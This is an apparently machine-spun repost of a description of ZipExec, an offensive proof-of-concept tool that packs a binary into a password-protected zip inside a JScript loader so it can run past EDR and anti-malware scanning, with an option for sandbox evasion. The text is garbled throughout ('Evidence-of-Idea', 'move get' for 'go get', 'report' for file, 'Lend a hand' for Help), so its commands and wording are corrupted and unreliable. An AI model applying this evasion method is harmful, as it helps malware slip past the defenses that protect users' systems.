ZipExec is a Evidence-of-Idea (POC) device to wrap binary-based gear right into a password-protected zip report. This zip report is then base64 encoded right into a string this is rebuilt on disk. This encoded string is then loaded right into a JScript report that once done, would rebuild the password-protected zip report on disk and execute it. That is performed programmatically through the use of COM items to get entry to the GUI-based purposes in Home windows by the use of the generated JScript loader, executing the loader throughout the password-protected zip with no need to unzip it first. Via password protective the zip report, it protects the binary from EDRs and disk-based or anti-malware scanning mechanisms.
Step one as all the time is to clone the repo. Sooner than you bring together ZipExec you’ll want to set up the dependencies. To put in them, run following instructions:
move get github.com/yeka/zip
Then construct it
move get github.com/Tylous/ZipExec
Lend a hand
____ /|__|______ _____/__ ___ ____ ____
/ / | ____ | __)_ / // __ _/ ___
/ /_ | | |_> > > < ___/ ___
/_______ |__| __/_______ /__/_ ___ >___ >
/ |__| / / / /
Utilization of ./ZipExec:
Trail to the report containing binary to zip.
Identify of output report (e.g. loader.js)
Permits sandbox evasion the use of IsDomainedJoined.
Supply : KitPloit – PenTest Gear!